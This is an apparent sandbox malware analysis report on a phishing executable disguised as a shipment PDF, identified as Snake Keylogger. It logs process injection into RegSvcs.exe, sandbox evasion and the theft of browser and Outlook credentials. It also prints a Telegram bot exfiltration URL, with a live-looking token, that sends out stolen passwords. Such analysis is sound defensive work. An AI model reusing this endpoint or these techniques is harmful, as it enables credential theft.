Source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@5/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe

File created: C:\Users\user\AppData\Local\Temp\aut6E2E.tmp

Jump to behavior

Source: Shipment Document BL,INV and packing list.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Shipment Document BL,INV and packing list.pdf.exe

ReversingLabs: Detection: 50%

Source: unknown	Process created: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Shipment Document BL,INV and packing list.pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Shipment Document BL,INV and packing list.pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Shipment Document BL,INV and packing list.pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Shipment Document BL,INV and packing list.pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Shipment Document BL,INV and packing list.pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Shipment Document BL,INV and packing list.pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Shipment Document BL,INV and packing list.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: Shipment Document BL,INV and packing list.pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Shipment Document BL,INV and packing list.pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Shipment Document BL,INV and packing list.pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Shipment Document BL,INV and packing list.pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Shipment Document BL,INV and packing list.pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	File created: \shipment document bl,inv and packing list.pdf.exe
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	File created: \shipment document bl,inv and packing list.pdf.exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: Shipment Document BL,INV and packing list.pdf.exe

Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe

API/Special instruction interceptor: Address: A6DF34

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.352976428.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.353487685.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.352997642.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358453034.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.353512252.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: PROCMON.EXE^(

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Window / User API: threadDelayed 9563

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008

Jump to behavior

Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"

Jump to behavior

Source: Shipment Document BL,INV and packing list.pdf.exe

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Binary or memory string: mcupdate.exe

Stealing of Sensitive Information

Yara detected MSIL Logger

Source: Yara match	File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior

Source: Yara match	File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR

Remote Access Functionality

Yara detected MSIL Logger

Source: Yara match	File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	212 Process Injection	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Virtualization/Sandbox Evasion	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	212 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	113 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Shipment Document BL,INV and packing list.pdf.exe	50%	ReversingLabs	Win32.Trojan.AutoitInject

Source	Detection	Scanner	Label	Link
http://api.telegram.orgX	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632407857&caption=user%20/%20Passwords%20/%208.46.123.189	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://reallyfreegeoip.orgX	RegSvcs.exe, 00000002.00000002.879714743.00000000020BF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.orgX	RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189X	RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.diginotar.nl/cps/pkioverheid0	RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.0000000002096000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632	RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
http://reallyfreegeoip.org	RegSvcs.exe, 00000002.00000002.879714743.00000000020BF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/X	RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net0D	RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000002.00000002.879714743.0000000002021000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comX	RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	false		high
